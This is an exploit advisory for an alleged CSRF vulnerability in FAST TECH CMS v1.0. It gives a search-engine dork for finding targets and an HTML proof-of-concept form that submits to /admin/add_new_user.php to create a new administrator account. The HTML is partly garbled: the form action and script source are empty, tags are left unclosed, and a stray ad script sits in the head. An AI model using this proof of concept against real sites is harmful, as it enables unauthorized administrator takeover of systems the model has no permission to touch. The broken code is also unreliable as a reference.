Authored by indoushka

FAST TECH CMS version 1.0 suffers from a cross site request forgery vulnerability.

| # Title : FAST TECH CMS v1.0 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 73.0.1(32-bit) |
| # Vendor : |
| # Dork : Designed & Developed by FAST TECH TECHNOLOGIES SERVICES PVT LTD . All rights reserved. |

poc :

[+] Dorking İn Google Or Other Search Enggine.

[+] The following html code create a new admin .

[+] Go to the line 5.

[+] Set the target site link Save changes and apply .

[+] infected file : /admin/add_new_user.php

[+] save code as poc.html .

<!DOCTYPE html>
<html xmlns="">
<head profile="">
<script data-ad-client="ca-pub-6966557515756083" async src=""></script>
<form action="" method="post" name="newuserform" enctype="multipart/form-data">
<div class="form-group">
<input type="text" class="form-control" id="name" name="name" placeholder="Enter Name ..." required>
<div class="form-group">
<label>User Name</label>
<input type="text" class="form-control" id="username" name="username" placeholder="Enter User Name ..." required>

<div class="form-group">
<input type="password" class="form-control" id="password" name="password" placeholder="Enter Password ..." required>

<div class="form-group">
<label>Confirm Password</label>
<input type="password" class="form-control" id="confirmpassword" name="confirmpassword" placeholder="Enter Confirm Password ..." required>

<div class="form-group">
<label>User Type</label>
<select class="form-control" id="usertype" name="usertype" required>
<option>Select Type</option>
<option value="A">Administrator</option>
<option value="R">Retail</option>


<div class="form-group">
<input type="text" class="form-control" id="emailid" name="emailid" placeholder="Enter Email-Id ..." required>

<div class="box-footer">
<button type="submit" class="btn btn-primary" name="submit">Submit</button>


Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas**LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr |